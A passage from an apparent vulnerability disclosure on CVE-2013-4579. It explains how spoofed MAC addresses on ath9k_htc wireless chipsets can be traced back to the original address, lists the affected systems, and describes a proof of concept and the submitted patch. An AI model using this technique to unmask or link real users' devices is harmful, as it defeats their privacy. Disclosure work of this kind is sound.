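fake = 0xDEADBEEF0001      # made-up spoofed address
device = make_vulnerable_device(real, fake)
print(hex(recover_original(fake, device)))
```

Only 48 probes are needed, one per bit of the address.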

The vulnerability has been successfully exploited against AR7010 and AR9271 chipsets (which use the ath9k_htc driver) under following operating systems:
  • Debian 7.2.0 amd64 and i386
  • Kali 1.0.5 amd64 and i386
  • Ubuntu 13.10 amd64 and i386
The ath9k driver is not vulnerable (see comments below). The ath5k and ath10k drivers were not tested and/or investigated. Other drivers that can create multiple virtual interfaces with different MAC addresses on a single device might be susceptible to the same vulnerability (so feel free to test your device and post results).

Exploit

A proof of concept has been implemented in python using scapy. Given a MAC address that you suspect to be spoofed the tool will attempt to uncover the original MAC address. In case the tool returns the same MAC address as you entered, it means the target is not susceptible to the attack, or that the target is using the default MAC address of the device.

Patch

Update: I have made a patch and submitted it to the linux-wireless@vger.kernel.org mailing list (before this patch I also notified the ath9k-devel mailing list of the bug and filed a bug report for debian). The CVE ID of this bug is CVE-2013-4579.

Final Remarks

Though spoofing a MAC address can be done securely by simply updating mainmac, an attacker can use the same technique to learn that two virtual MAC addresses actually belong to the same user. So if you put up several virtual interfaces (possibly with random MAC addresses) they can be easily linked back together (again, that's if your device uses a method similar to the one described above). This flaw is inherent to usage of macmask and, at first sight, seems difficult to fix.